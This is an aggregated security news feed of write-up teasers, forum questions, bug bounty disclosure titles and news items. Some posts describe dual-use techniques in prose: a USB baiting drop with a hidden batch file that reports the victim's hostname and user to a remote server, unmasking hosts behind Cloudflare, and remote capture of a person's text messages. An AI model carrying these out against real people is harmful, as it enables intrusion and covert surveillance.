    Multiple ways to Bypass a File upload feature and chain it to an RCE. Continue reading on Medium »
    Amazon Cognito misconfiguration lead to account takeover
    Hello reader, I hope you are doing well. Today I want to talk about one of my findings. It was a public program and the bug is not fixed… Continue reading on Medium »
    ALEX2 Orderbook: Testnet with Bug Bounty rewards and more
    Testnet of a decentralized exchange from the ALEX2 project. Continue reading on Medium »
    How HTML Injection in email got me my first SWAG…
    Namaste!! It’s me yours Aakash Tayal (Spoopyghost) this is my second write-up or we can say first write-up because my first write-up in… Continue reading on Medium »
    Bypassing Multiple 403 Response Type Pages
    Description: Continue reading on Medium »
    Browser Extensions which have landed $$$ !
    What’s up everybody. My name is Sagar Sajeev. Continue reading on Medium »
  • Open

    Practice images
    Hi All. Reaching out to the community to see if you have any references for where to obtain free or cheap mock compromised server/computer/memory images to practice your forensic skills on. I’m a GCFE/GCFA holder but don’t get to directly utilize the level of forensic knowledge that is covered in those classes on a daily basis at work. I don’t want my knowledge and skills to lapse though and would like to practice on some images from time to time to keep those skills fresh. I’m hoping there might be some resources out there that allow for this. Thank you! submitted by /u/Ckn0wt [link] [comments]
    Forensic 4:cast Awards Creation Video
    submitted by /u/Schizophreud [link] [comments]
    TCU Hashtopolis (2022AUG08)
    The latest "TCU Hashtopolis" (2022AUG08) has been released. This live distro automatically initializes the Hashtopolis Linux agent and adds it to your Hashtopolis cluster. This release includes an SSH server (u:user, p:live) so you can log in to debug the agent if required, which can be particularly helpful when a Hashtopolis task fails to benchmark your agent and the agent pulls itself out of the cluster. It also has hashcat included, so if you stop the Passware Linux agent you can use it for direct hashcat jobs. See the README.pdf for more info. https://drive.google.com/drive/folders/1xkDBNCr-KBg8FTMvTc70sxm0nr-6qYCG?usp=sharing submitted by /u/atdt0 [link] [comments]
    Can anyone recommend best way to capture cell phone text messages remotely?
    I don’t do this often. When I’m asked to I wing it most of the time. We are trying to see if there are options besides going to the person to do the capture. This person has an iPhone. Thanks. submitted by /u/hw60068n [link] [comments]
  • Open

    wtf is security-enabled global group
    Hey folks, I have alerts in my SIEM based on event ID 4728. Seems that there is a similar log, 4732. I understand someone was added to some group in AD, but what is considered "security-enabled" in practice? Do you need to configure in the settings of the AD object that it will be considered security-enabled? Or is the group considered so automatically when it has some high permission to something? Thanks. submitted by /u/Webly99 [link] [comments]
    Does the US govt really pay for information?
    https://www.bleepingcomputer.com/news/security/us-govt-will-pay-you-10-million-for-info-on-conti-ransomware-members/ Saw that article today and it made me wonder if they really pay. I remember someone said they never do, but I can't remember who. submitted by /u/Chroll-On [link] [comments]
    Partner company requesting we get our client cert for 2-way SSL handshake be signed by a trusted CA. Am I crazy or is that pointless?
    As the title suggests. They asked for a client cert they could trust for 2-way SSL, and when I gave them my self-signed cert they were concerned and said they couldn't accept self-signed certs. I am baffled as to why this is necessary, but before blindly thinking I know best I wanted to ask the community. Are there situations or reasons why this would make sense? submitted by /u/grasponcrypto [link] [comments]
    Dealing with Old Servers
    Any advice for dealing with old servers that can’t be (easily) upgraded for various reasons? We’ve a handful of servers that are running old versions of CentOS and Debian - old old, like CentOS 5 and 6 old. Even if CentOS as a project hadn’t gone the way of the dodo, these servers wouldn’t be getting security updates any more. The obvious thing to do would be to migrate whatever they’re hosting to new servers and shut off the old ones, but logistically that’s not really a runner - at least not quickly. They’re running old, but still used, PHP applications built on old versions of Zend; updating these applications to work with more recent versions of PHP or retiring them entirely is a work in progress. In the meantime the servers have sometimes hundreds of vulnerabilities each. Any suggestions on what I can do to reduce the attack surface in the absence of being able to update/retire them? submitted by /u/deadlock_ie [link] [comments]
    SANS Grad Cert Purple Team Operations vs Cyber Defense Operations
    Hey all! I want to pick your brains on a topic. So, I'm looking into getting a SANS grad cert but it's a toss-up between the two in the title. I have done my research and found that either of these will fit my goal. I can honestly go either way but would like to get insight as to which one of the two would be better. I have around 5 or 6 years of cybersecurity experience and I've held a SOC title before. However, I would like to get more involved in both red/blue team shenanigans when possible lol. My company (thank the stars) is paying for this and I can always take more SANS courses with my education assistance program. So, filling in the blanks on areas I may not know won't be a problem. Now that that is out of the way, I would like to get your thoughts on those cert programs as well as the pros/cons of them. I'm currently waiting on my GCIH material, so once I pass that I will be entering one of these programs. I am very interested in having knowledge in pen-testing as well as advanced defenses and techniques. The CDO has courses that are very interesting and the certs I would get out of it are GREAT! and will really fortify my knowledge of hardening and automation. But the purple team has a little bit of both, which will help me bridge the gap in some areas I'm weak in right now. (Side note: I wanted to do the pentest path but I'm not ready for that yet. So, I'll just take certs when I can after I complete one of the grad certs lol). Please don't judge, my ADHD brain is all over the place right now hahaha. Hope to get some good feedback and hope that I explained my situation well enough. submitted by /u/StoneyW [link] [comments]
  • Open

    Intelligence and IGR: how companies dealing with the State can improve their decision making
    The private representation of interests before public entities, although a historically recurring fact, has been intensified locally in… Continue reading on Medium »
    ESG and Greenwashing: how to mitigate the risk between suppliers and third parties
    A company commits Greenwashing when it omits or lies about the environmental impacts of its products. Continue reading on Medium »
    Why do you need an ally? — 5 reasons to hire a company to investigate your debtor’s patrimony
    The market dynamics are not always harmonious: while some contracts are successfully closed, others are finished by one of the parties for… Continue reading on Medium »
    How to identify fraud against creditors and recover assets efficiently?
    As is well known, one of the biggest issues in execution proceedings or even in compliance with a court sentence is the creditor’s search… Continue reading on Medium »
    The emergence of OSINT: how news analysis in WW2 influenced open-source search
    In view of the needs that have grown along with the technological advance, the demand for means of obtaining and filtering data for… Continue reading on Medium »
  • Open

    Rapid7 Discovered Vulnerabilities in Cisco ASA, ASDM, and FirePOWER
    submitted by /u/chicksdigthelongrun [link] [comments]
    Security Implications of URL Parsing Differentials
    submitted by /u/monoimpact [link] [comments]
    capa v4: casting a wider .NET
    submitted by /u/sanitybit [link] [comments]
    Researching TEE payment system built into Xiaomi smartphones powered by MediaTek
    submitted by /u/sanitybit [link] [comments]
    DNSMonitor leverages Apple's Network Extension Framework to monitor DNS requests and responses
    submitted by /u/sanitybit [link] [comments]
    The cloud has an isolation problem: PostgreSQL vulnerabilities affect multiple cloud vendors | Wiz Blog
    submitted by /u/juken [link] [comments]
    What Happened to Lapsus$
    submitted by /u/TravenDev [link] [comments]
  • Open

    Useful redteam github links
    https://github.com/A0RX/Red-Blueteam-party https://github.com/MantisSTS/RedTeamTools https://github.com/idchoppers/redTeaming https://github.com/irredteam/irredteam.github.io https://github.com/0xMrNiko/Awesome-Red-Teaming https://github.com/J0hnbX/RedTeam-Resources submitted by /u/ff6764 [link] [comments]
    Wifi Traffic Analysis in Wireshark
    submitted by /u/tbhaxor [link] [comments]
  • Open

    SecWiki News 2022-08-12 Review
    The ten most noteworthy topics at Black Hat 2022 by ourren. On the nature of security confrontation by ourren. Attack-defense exercises from a cloud sandbox perspective: a summary of sample-based attack techniques by ourren. Data security in intelligent systems by ourren. A beginner's guide to Selenium automation by ourren. A brief discussion of NFT, Web3 and the metaverse by ourren. DevOps risk mapping: the code chapter by ourren. The term "data-free knowledge distillation" by ourren. For more of the latest articles, visit SecWiki
  • Open

    Help executing the PoC for CVE-2022-22582
    Ok so I'm trying to execute the CVE that I referenced on my local Mac (version 11.6.1). I've looked at the original PoC at http://www.github.com/poizon-box/CVE-2022-22582. This doesn't produce any errors, but the exploit is supposed to take advantage of symlinks to overwrite privileged files, and I don't understand how that's supposed to work. If you could help me it would be very appreciated. submitted by /u/GuillotineNamedJEff [link] [comments]
    Linux kernel exploitation series (if you know Japanese or trust Google translate)
    submitted by /u/0xor0ne [link] [comments]
  • Open

    Reflected XSS at https://stories.showmax.com/wp-content/themes/theme-internal_ss/blocks/ajax/a.php via `ss_country_filter` param
    Showmax disclosed a bug submitted by miron666: https://hackerone.com/reports/1663202 - Bounty: $150
  • Open

    CVE-2020-15139: From Self-XSS to Persistent DOM-XSS
    My journey into discovering CVE-2020-15139 Continue reading on Medium »
  • Open

    An experience going from an App to getshell
    During an authorized penetration test, we learned that the test objective was to obtain privileges or key user data.
    He Yi: Confessions of an enterprise-side security entrepreneur
    He Yi, founder and CEO of 持安科技, was invited to the conference and shared "Confessions of an Enterprise-Side Security Entrepreneur".
    Summary of database injection privilege escalation (Part 4)
    A permission is a user's right to execute a function.
    A usage guide for the Guomi (Chinese national cryptography) wget
    wget is a free tool developed by GNU for automatically downloading files from the network.
    Enterprise data security governance 1+3+1+1
    Enterprise data security governance is a complex and heavy undertaking; it is especially challenging in a context where data security is tightly coupled with network security and application security, and it needs to be considered holistically.
    2022 Global Cyber Threat Report
    Source: Acronis. Authors: Alexander Ivanyuk (Senior Director, Product and Technology Positioning, Acronis) and Candid Wuest (Vice President, Cyber Protection Research, Acronis). Contents: Introduction and summary; Part 1: Key cyber threats and trends of 2021; Part 2: Common malware threats; Part 3: Vulnerabilities in the Windows operating system and software; Part 4: Security predictions for 2022; Part 5: What Acronis proposes for staying secure in the current and future threat environment…
    Banking trojan SOVA makes a comeback and may launch ransomware attacks
    The SOVA banking trojan that has plagued the Android platform has made a comeback, adding more new features compared with before and possibly even carrying out ransomware attacks.
    US offers a $10 million reward for information on Conti members
    The US State Department today announced a $10 million reward for information on five senior members of the Conti ransomware group.
    $540 million involved: cybercriminals are laundering money through the RenBridge cross-chain platform
    The platform allows assets to be moved seamlessly between different blockchain networks, for example converting Bitcoin to the Ethereum blockchain.
  • Open

    What is Fuzz Testing? Definition, History, Uses and Importance.
    Sometimes, software security seems to be created with a loophole for attackers to exploit, various ways to manage such vulnerabilities… Continue reading on Medium »
  • Open

    Configuring TOR with Python
    No content preview
    Let’s Learn API Security: More about Excessive Data Exposure
    We are going to talk about “Excessive Data Exposure” in this post that we are making for API Security. Continue reading on InfoSec Write-ups »
  • Open

    New Vulnerability Affects All AMD Zen CPUs: Threading May Need to Be Disabled
    Article URL: https://www.tomshardware.com/news/new-vulnerability-affects-all-amd-zen-cpus Comments URL: https://news.ycombinator.com/item?id=32434119 Points: 3 # Comments: 1

  • Open

    Sketchy colleague stuck a non-work-related USB drive in my work macbook without my consent and pulled it out before I could see what he was doing, what should I look out for/include in my report to T&S?
    I'm not in netsec myself. A shady colleague recently asked me if he could "check something" on a macbook I use at work. I asked what it was and he said it was photos related to his side-gig (artist). I said "No, I'm not comfortable with that, why not check it on your own laptop?", but I wasn't standing close enough to my desk to physically stop him. He said "It'll just take a minute" and stuck a USB drive in my macbook. 100% my fault for leaving it unlocked; I was literally 3 feet away on the other side of a half-height cubicle wall helping a colleague with a question at their desk, and I should know better. As soon as I saw him stick the drive in I walked back toward my desk; when I got close enough to see the screen he yanked it out and said "That's all I needed, thanks" and walked away. I plan on contacting our trust & safety team, but because of this colleague's position they will see the report at the same time the T&S team does, and because of previous experiences with this colleague I fully expect that (a) there was something malicious on the drive and (b) they'll start working on a cover story immediately after I send my report. What can I look for as evidence that something malicious happened (if something malicious did actually happen) before reporting it, so that it can be included in the report, and minimize their time to come up with a cover story for anything objectionable they did? For all I know it was innocent (just checking color profiles of some photographed works on a retina screen or something? idk) but given the fact that I asked him not to and he did anyway (as well as past experience with this guy) I'm suspicious. e: I know virtually nothing about macs, just have to use one at work. submitted by /u/No_Manufacturer_4701 [link] [comments]
    Powershell relevance
    I've rare time off and am going thru a backlog of redteam trainings/materials/posts/talks/ and blogposts. I notice a lot of Powersploit or Powershell C2s. Esp. on blogs. Those ones I understand, as usually they're from individuals who don't have an entity bankrolling expensive toolsets. I am also aware that PSH has been quite thoroughly swisscheesed by blueteamers these days. I'm thinking it's rather irrelevant to do anything with PSH materials, based on my experience using Cobalt Strike where we're reliant on BOFs and .NET assys. Especially to evade sophisticated AV/EDRs. But I've not worked in enough variety of shops yet. Tho many moons ago I listened to a 10minSecurity (or might've been called 7minSecurity) podcast where it seemed like they used such tools at a commercial firm. Altho, iirc it also seemed like the owner was newly getting this firm up and new in the pentesting~teaming space, which is why he might have been using such tooling. TLDR: Not sure if it is worth going thru these Powersploit/Empire/other PSH-centered tools still? Also I've never done a NCCDC but might do one in the future for shits and giggles. Is it PSH tooling they use? submitted by /u/blabbities [link] [comments]
    Monitored SOC/SIEM Questions
    Hi all, We're currently reviewing a number of solutions for a monitored SOC/SIEM. This is relatively new to me so I'm just attending meetings with my managers and vendors just for the experience. We're a small one-site business, 150+ userbase, mostly Windows on prem/Azure/M365 and a firewall and VPN (which is our main tool for remote work). I am wondering if there's anything in particular I should watch out for during the meetings? Is there a list of features or requirements that would be almost standard? submitted by /u/DaithiG [link] [comments]
    Media Drop / Baiting attack with USB Drive
    Hey guys, I'm working on creating a media drop off / baiting USB drive. Goal: Create a USB stick to drop it in the parking lot, at the reception or at a desk, bait the user to insert it into a computer and click on the contents - calling to my server to know they clicked. Current plan and try: I created a file called windows.bat on the drive, which is set to be hidden. The batch file basically does a curl to a specified endpoint (a server I control, allowing me to know they opened it), which after that outputs some troll stuff, so the employee knows they got tricked. That endpoint also includes the output of "hostname" and "whoami", so I know who it was that clicked on it. I then created some shortcuts like "Private" (with a folder as symbol) or "Vacation-Photos of Monica" or "Tax-Report 2021" etc., that all point to that batch file. Besides the fact that they have the shortcut arrow symbol, it looks "authentic enough" for most employees probably. The problem: those shortcuts include the drive letter, which varies from device to device. So like this, it won't work. I thought about whether it's possible to use relative paths for the shortcut, but this doesn't seem to be too easy in Windows (or basically not possible at all). Do you guys have any other idea on how to get this working? The only thing that "the opened file" has to do is somehow access this endpoint, and the user should be somehow baited into clicking and opening this tempting-looking file. submitted by /u/namelessOnReddit_ [link] [comments]
    Audio Steganography: what kind of method might have been used?
    Waveform image of a part of the audio: https://imgur.com/a/x2pkEj7 submitted by /u/AlternativeResult448 [link] [comments]
    Web-based Pcap Viewers
    I’m doing some research and want to hear what NetSec folks think of services like CloudShark and apackets.com which let you upload pcap files and analyze them. Do you use any online services to view pcap files? If not, is sending traffic captures to a third-party the biggest concern? submitted by /u/codebyamir [link] [comments]
    Why would an attacker send GET requests for NSFW/porn websites from external IPs into the victim’s DMZ when they have nothing to do with that kind of content?
    The host field contains porn sites, but the destination IP is the victim company. submitted by /u/Free-Roaming-Orange [link] [comments]
  • Open

    Disabling context isolation, nodeIntegrationInSubFrames using an unauthorised frame.
    Internet Bug Bounty disclosed a bug submitted by s1r1u5: https://hackerone.com/reports/1647287 - Bounty: $2400
    Admin panel Exposure without credential at https://plus-website.shopifycloud.com/admin.php
    Shopify disclosed a bug submitted by 0x50d: https://hackerone.com/reports/1417288 - Bounty: $2900
    Wordpress Users Disclosure (/wp-json/wp/v2/users/)
    Top Echelon Software disclosed a bug submitted by hammodmt: https://hackerone.com/reports/1663363
    fix(security):Path Traversal Bug
    Hyperledger disclosed a bug submitted by bhaskar_ram: https://hackerone.com/reports/1664244
    Disable xmlrpc.php file
    Top Echelon Software disclosed a bug submitted by sohelahmed786: https://hackerone.com/reports/712321
    Redirection in Repeater & Intruder Tab
    PortSwigger Web Security disclosed a bug submitted by mr_vrush: https://hackerone.com/reports/1541301 - Bounty: $150
  • Open

    Researchers Find Vulnerability in Software Underlying Discord, Microsoft Teams
    Article URL: https://www.vice.com/en/article/m7gb7y/researchers-find-vulnerability-in-software-underlying-discord-microsoft-teams-and-other-apps Comments URL: https://news.ycombinator.com/item?id=32430582 Points: 1 # Comments: 0
    Baton Drop (CVE-2022-21894): Secure Boot Security Feature Bypass Vulnerability
    Article URL: https://github.com/Wack0/CVE-2022-21894 Comments URL: https://news.ycombinator.com/item?id=32429156 Points: 4 # Comments: 0
    Stats say Chinese researchers are not deterred by China's vulnerability law
    Article URL: https://www.scmagazine.com/editorial/analysis/compliance/stats-say-chinese-researchers-are-not-deterred-by-chinas-vulnerability-law Comments URL: https://news.ycombinator.com/item?id=32423207 Points: 2 # Comments: 0
  • Open

    Fully dockerized Linux kernel debugging environment
    submitted by /u/0x00rick [link] [comments]
    Detecting DNS implants: Old kitten, new tricks – A Saitama Case Study – NCC Group Research
    submitted by /u/digicat [link] [comments]
    Hunting for Low and Slow Password Sprays Using Machine Learning (ML Deep Dive)
    submitted by /u/SCI_Rusher [link] [comments]
    Concealed code execution: Techniques and detection
    submitted by /u/darronofsky [link] [comments]
    Enhancing Subdomain Enumeration - ENTs and NOERROR
    submitted by /u/doitsukara [link] [comments]
    A deep dive into an in-the-wild Android exploit: the quantum state of Linux kernel garbage collection - CVE-2021-0920 (Part 1)
    submitted by /u/sanitybit [link] [comments]
  • Open

    Getting started with Cyber Security
    A complete roadmap for young computer security aspirants Continue reading on Medium »
    ALEX2 Orderbook: Testnet with Bug Bounty rewards and more
    Testnet of a decentralized exchange from the ALEX2 project. Continue reading on Medium »
    JWT None Attack! What is it? And why does it occur?
    Everyone must have seen the JWT (JSON Web Token) token normally used for authentication in SSO (Single Sign-On). The JWT is made to… Continue reading on Medium »
    Improper Cache Control Vulnerability
    Hello everyone🎉 !!! I hope you all are doing well. Continue reading on Medium »
    My Experience on Hacking the Dutch Government
    Hello, fellow Bug Hunters! It’s me again Jefferson Gonzales, and in this article, I’ll tell you about how I got my dream Dutch Government… Continue reading on Medium »
  • Open

    The quantum state of Linux kernel garbage collection CVE-2021-0920 (Part I)
    Article URL: https://googleprojectzero.blogspot.com/2022/08/the-quantum-state-of-linux-kernel.html Comments URL: https://news.ycombinator.com/item?id=32420147 Points: 2 # Comments: 0
  • Open

    How to OSINT Russia? (even if you don’t speak Russian). Part 1 -Starter Pack
    Since the Russian invasion of Ukraine, the attention of OSINTers took a sharp turn east. A large number of “expert” accounts emerged on… Continue reading on Medium »
  • Open

    My Journey: From Pentest to Red Team to Blue
    I was a web application developer in 2010 when I learned about pentesting. I fell in love with the idea that I could get paid to break… Continue reading on Walmart Global Tech Blog »
    Find command for CTF players/ Penetration testers.
    The find command is among the most useful tools in the arsenal of Linux system administrators. The find command searches a directory… Continue reading on System Weakness »
  • Open

    SecWiki News 2022-08-11 Review
    No news has been updated yet today~ For more of the latest articles, visit SecWiki
  • Open

    PortSwigger Web Security Lab: SQL injection UNION attack, determining the number of columns…
    No content preview
    Hacker101 CTF — Micro CMS v1 Flag 0
    No content preview
    Phoenix Challenges — Stack Zero
    No content preview
  • Open

    Breaking! Midea reportedly hit by ransomware attack
    Midea Group has reportedly suffered a ransomware attack; computers in multiple locations in its factories were infected with ransomware, leaving the intranet systems unreachable and all files unopenable.
    New trend: hacker-for-hire becomes a business
    Cybercrime has entered a new era; hackers no longer launch attacks merely for the thrill.
    Sophos: three ransomware groups found attacking the same network in succession for the first time
    Sophos X-Ops reported that an automotive supplier's systems were breached by three different ransomware gangs within two weeks in May.
    FreeBuf Weekly | Cisco confirms ransomware attack; Danish 7-Eleven stores closed due to cyberattack
    Happy weekend, Buffers; here is this week's "FreeBuf Weekly"!
    Gartner releases the 2022 Hype Cycle for Emerging Technologies
    Evolving/expanding immersive experiences, accelerating AI automation, and optimizing technologist delivery.
    FreeBuf Morning Report | New dark web market claims ties to a criminal cartel; Cisco hacked by the Yanluowang ransomware gang
    An automotive supplier's systems were compromised by three different ransomware gangs within two weeks in May, and their files were encrypted.
    Cisco confirms ransomware attack, 2.8GB of data leaked
    Cisco confirmed that the Yanluowang ransomware group breached the company's network in late May this year, and the attackers attempted to extort a ransom by threatening to leak the stolen data.
    In-depth investigation reveals the story behind phishing emails
    Jointly exploring "The Story Behind Phishing Emails", decoding the astonishing tricks hidden behind phishing emails.
    Former Twitter employee faces up to 20 years in prison for espionage
    For stealing private information about Twitter users and handing the data to the Saudi Arabian government, US citizen Ahmad Abouammo faces up to 20 years in prison.
  • Open

    SD card locked/decrypted?
    I have a noname SD card that comes from a car navigation system and it contains a lot of data. It is possible to get the data by connecting the card to the navigation system and to a computer at the same time. This way, the navigation system seems to unlock the card and it gets mounted by my computer. I would prefer not to use the navigation system in this process, but when I connect the card to my computer only, I can't access it. There is just a generic SCSI driver available. Do you know anything like this? Is it possible to "lock" or encrypt the SD card? submitted by /u/Knuust [link] [comments]
  • Open

    [Open Proxy Project] 400+ Verified Proxies every 15 minutes!
    A collection of aggregated open proxies across the internet, cross-examined and maintained every 15 minutes via automation. Link: https://Oproxy.ml Source Code: https://github.com/midhunvnadh/Open-Proxy-Project submitted by /u/MidhunVNadh [link] [comments]
  • Open

    Researching the Windows Registry
    The Windows Registry is a magical place that I love to research because there's always something new and fun to find, and apply to detections and DFIR analysis! Some of my recent research topics have included default behaviors with respect to running macros in Office documents downloaded from the Internet, default settings for mounting ISO/IMG files, as well as how to go about enabling RDP account lockouts based on failed login attempts.  Not long ago I ran across some settings specific to nested VHD files, and thought, well...okay, I've seen virtual machines installed on systems during incidents, as a means of defense evasion, and VHD/VHDX files are one such resource. Further, they don't require another application, like VMWare or VirtualBox. Digging a bit further, I found this MS documen…

  • Open

    How Cisco got hacked - insights on what the attackers did
    submitted by /u/jwizq [link] [comments]
    AWSGoat is a vulnerable by design infrastructure on AWS featuring the latest released OWASP Top 10 web application security risks (2021) and other misconfigured AWS services.
    submitted by /u/sanitybit [link] [comments]
    Browser-Powered Desync Attacks: A New Frontier in HTTP Request Smuggling
    submitted by /u/Fugitif [link] [comments]
    Cryptominer detection: a Machine Learning approach
    submitted by /u/MiguelHzBz [link] [comments]
    DeathStalker’s continuous strike at foreign and cryptocurrency exchanges
    submitted by /u/EspoJ [link] [comments]
    BlueHound combines information about user permissions, network access and unpatched vulnerabilities to reveal the paths attackers would take if they were inside your network.
    submitted by /u/sanitybit [link] [comments]
    PowerHuntShares is designed to automatically inventory, analyze, and report excessive privilege assigned to SMB shares on Active Directory domain joined computers
    submitted by /u/sanitybit [link] [comments]
    ÆPIC Leak: Intel CPU bug able to architecturally disclose sensitive data
    submitted by /u/sanitybit [link] [comments]
    A Novel SIP Based Distributed Reflection Denial-of-Service Attack and an Effective Defense Mechanism
    submitted by /u/sanitybit [link] [comments]
    Everything In Its Right Place - Part 2
    submitted by /u/Gallus [link] [comments]
    From Shared Dash to Root Bash :: Pre-Authenticated RCE in VMWare vRealize Operations Manager
    submitted by /u/Gallus [link] [comments]
  • Open

    How I earned a $6000 bug bounty from Cloudflare
    Introduction: Continue reading on Medium »
    Defeat the HttpOnly flag to achieve Account Takeover | RXSS
    Hello folks, I’m Mohamed Tarek aka Timooon at Bugcrowd and HackerOne, In this write up I will explain how I get the victim’s session when… Continue reading on Medium »
    Email Confirmation bypass at Instagram
    This story is all about a logical vulnerability which helped me in Bypassing the email confirmation process and adding any arbitrary… Continue reading on Medium »
    403 Forbidden Bypass Leading to Admin Endpoint Access.
    Hi everyone! This is my first write-up, pardon me for any mistakes. I’ll share my tip with everyone how I was able to bypass a 403… Continue reading on Medium »
    Enhancing Subdomain Enumeration — ENTs and NOERROR
    Identifying subdomains more reliably by checking DNS status codes and empty nodes Continue reading on SSE Blog »
    Stealing Gas From dYdX, 0.5 ETH A Day
    Gas is liquid gold. Back in February 2022, we found a way to abuse a feature called “Gasless Deposits” on dYdX exchange that could allow… Continue reading on Medium »
    Everything (actually the basics) about Directory Traversal [PT/BR]
    Today I decided to do something a little different; normally I'm more in the habit of writing write-ups than writing about the vulnerabilities… Continue reading on Medium »
  • Open

    OSSIM Python Boolean Expression
    I am trying to get ossim to send me an email when a specific file is accessed. I have already set everything up so that OSSIM will send me an email when a file is accessed BUT I am trying to make it more granular to send an email when a specific file is accessed. Currently in Define Logical Condition I have PBE: FILENAME == "D:\Depts\Shared\test.txt" This does not trigger an email when I open the file. I can see in the event logs that the event is there and if I delete out the PBE and set condition to ANY, I will receive an email after opening this file. Any suggestions? I have tried different spacing, caps/no caps, etc. It appears to work on my other Actions when I filter by specific usernames, but not for FILENAME. submitted by /u/Sufficient-Bed2280 [link] [comments]
    I change everything but again Instagram detects me !!!!
    Hi guys, I changed my device, my public dynamic IP, username, password, email, browser, app, cookies, and everything, and again Instagram knows it's me. My question is: do you know if IG can spot that public dynamic IPs are coming from the same person, or do they know me another way? (because in this case I used a proxy and the problem was solved! though a dynamic IP didn't help). I know of device fingerprinting, but because I change everything I don't think it's the case. This case only affects me, not people in my region, so it's not related to geolocation, which is rough and not exact. What Instagram does is illegal in this case, considering it is tracking this way without the knowledge of the user. submitted by /u/amir_hossein0001 [link] [comments]
    Is Fortinet considered a high risk VPN?
    Our company's cyber security insurance identified Fortinet FortiGate VPN as a high risk due to "numerous critical code exploits". Instead they are pushing Zscaler or another ZTNA solution. submitted by /u/brainstormer77 [link] [comments]
    How secure is TCG Opal 2.0?
    I found various sources that claim that TCG Opal isn't really secure compared to something like LUKS/dm-crypt encryption (for example this video), but I don't seem to fully understand under what circumstances that is actually true. It looks like the standard itself isn't the problem, but rather the implementation of the SSD manufacturers. Is that true and how "dangerous" would it be to only use that encryption on a modern laptop with one of the latest SSDs and a standard threat level? Hope this is the right sub & thx in advance. submitted by /u/-_----_-- [link] [comments]
    safe to reset and use a phone found in a house clearance?
    Hi, looking for advice. I got a phone from a house clearance; everything in the house was going to the trash anyway, ready for a new tenant to move in. The phone's not amazing but it's better than my current one. Just wondering if resetting it would remove any potential weird things like tracking/spying software? Just got me a bit paranoid that the house was weird and full of other phones and watches... I got the feeling a drug dealer may have lived there previously. But wondering if resetting this phone will make it safe to use? It's a Samsung. submitted by /u/Spliceofcake [link] [comments]
    Viewing Thycotic secrets
    Is there a way to log when a user views only their own password/secrets? Or when a user views any password in general? submitted by /u/No_Cranberry_2292
    False positive Golden Ticket Tenable.ad
    Hello everyone, I have a question for people who have Tenable.ad in their infrastructure. We have had some Golden Ticket feedback from our Tenable.AD tool. As a precaution, we shut down our infrastructure for security reasons before reopening it. According to our initial analysis, this could be a false positive alert. Have you ever had this on your Tenable.ad? If so, through what means? Through authentication on a server? A machine account (e.g. hostname$)? Thanks a lot for your help :) submitted by /u/Captain_AdamBzh
    How do you check the real IP hosting server hidden behind Cloudflare?
    I have read this blog, which generally talks about the hidden IP address of a deepfake pornography website owner who victimized over 190 Kpop idols. https://blog.criminalip.io/2022/08/04/deepfake-porn-site/ They said they can find the real IP hidden behind Cloudflare using nslookup. But they ended in a vague sense. Can anybody tell me specifically how to check the real IP that is hidden by VPN, proxy, Cloudflare, etc.? I really want and need more details on this... thanks! submitted by /u/Glad_Living3908

    Exchange/Azure AD pen testing resources. Any tips or good articles about this?
    submitted by /u/One_Appeal_4080
    Advice for 2nd Interview for Red Team Internship
    The qualifications for the internship: Has or is pursuing all of the following -pursuing a relevant bachelor's degree -good communication skills, can work within a team and meet deadlines -basic knowledge of network protocols My first interview wasn't a technical interview. The interviewer just asked me basic questions about myself to get to know me and why I wanted to intern at their company specifically. She informed me that the second interview will be done by three people: two security consultants from their red team and a manager of business solutions. To give some insight as to what the internship will be like, during my first interview I asked my interviewer what to expect to be doing day to day. She told me I would be working alongside the red team on their current project. I would also work on the helpdesk a little. And I would get to work with the business consulting team as well to see how they meet with clients. This is all to try to give me different aspects of what their company does and give me solid hands-on experience. She did say primarily though that the internship focuses on working with the red team. My question is what should I expect from the second interview? Are they expecting me to be able to answer technical questions about pentesting? I have some experience doing CTFs. I am by no means a master at them but I have been doing them every day to try to learn more and improve. Any questions that I should expect to see so I can prepare for them? Any advice would be appreciated! Thank you in advance! submitted by /u/tyllanth

    BlueSky Ransomware: Fast Encryption via Multithreading
    BlueSky ransomware is an emerging family that has adopted modern techniques to evade security defenses. Read our technical analysis. The post BlueSky Ransomware: Fast Encryption via Multithreading appeared first on Unit 42.

    Sisyphus and the CVE Feed: Vulnerability Management at Scale
    Article URL: https://medium.com/airbnb-engineering/sisyphus-and-the-cve-feed-vulnerability-management-at-scale-e2749f86a7a4 Comments URL: https://news.ycombinator.com/item?id=32415629 Points: 1 # Comments: 0

    Hacker101 CTF — Travial CTF Flag 0
    Car Hacking: Cyber Security in Automotive Industry
    Write-up: Pickle Rick @ TryHackMe
    Hunting webshell with NeoPI
    RazorBlack: Active Directory Room From TryHackMe By Hashar Mujahid
    IIoT, Operational Technology Cybersecurity Challenges

    SecWiki News 2022-08-10 Review
    [HTB] Apocalyst Writeup by 0x584a. For more of the latest articles, visit SecWiki

    Enhancing Subdomain Enumeration — ENTs and NOERROR
    Identifying subdomains more reliably by checking DNS status codes and empty nodes Continue reading on SSE Blog »
    Why Is Automotive Cybersecurity So Important?
    What is automotive cybersecurity? Continue reading on Medium »
    “Borrowing, crossing borders…”
    (A short reflection for an OSINT-addicted summer) Continue reading on Medium »

    Log analysis practice tool
    Hey everybody. I am looking for something that could help me improve my forensic skills. The idea is that there is a case, I can view some logs and I have to tell what happened and whether the machine was compromised or not. After looking through the logs I can check the answer. Any ideas if there is something like that online? Thanks! submitted by /u/Full-Plankton-7607
    UFED 4PC and OPPO A54 5G problem
    Hi All, I found a problem in the acquisition of an OPPO A54 5G with UFED 4PC. I tried Advanced Logical and Android Backup. I used the dongle and set up the smartphone as directed by UFED (USB debugging, allow app, always on); however, the extraction always fails. Normally, at the beginning of an acquisition, the PC authorization request appears on the smartphone, but in this case it did not happen. I think this is the problem. Has this ever happened to anyone? What to do in this case? Thanks! submitted by /u/Max_Steiner
    Which software to make a preview of computer's hard disk?
    Hi all, I need to find the correct way to execute a preview of a computer's hard disk that allows me to see the files inside it like EnCase would. I start the PC with a Linux live USB. I can use Kali, Caine, Backbox or Tsurugi; these guarantee me that the disks are write-protected. At this point, without creating a disk image, which software in these Linux distros can I use to preview the hard disk like EnCase? Thanks! submitted by /u/Max_Steiner
    Cellebrite update disabled all USB ports.
    Hi friends, I recently upgraded Cellebrite UFED to the most recent update. Upon completing this, all USB ports on the machine became inactive. There are about 20 ports between the front and the back of this machine. The keyboard and mouse quit working, all plugged in USB drives were unrecognized. After uninstalling Cellebrite completely, all USB ports became active again. However, now, our EnCase dongle is unrecognized. Has anyone run into this issue? I found one article from 2020 and this is a known problem with UFED. submitted by /u/Fun_House2633

    many commands can be manipulated to delete identities or affiliations
    Hyperledger disclosed a bug submitted by cet2000: https://hackerone.com/reports/348090 - Bounty: $500
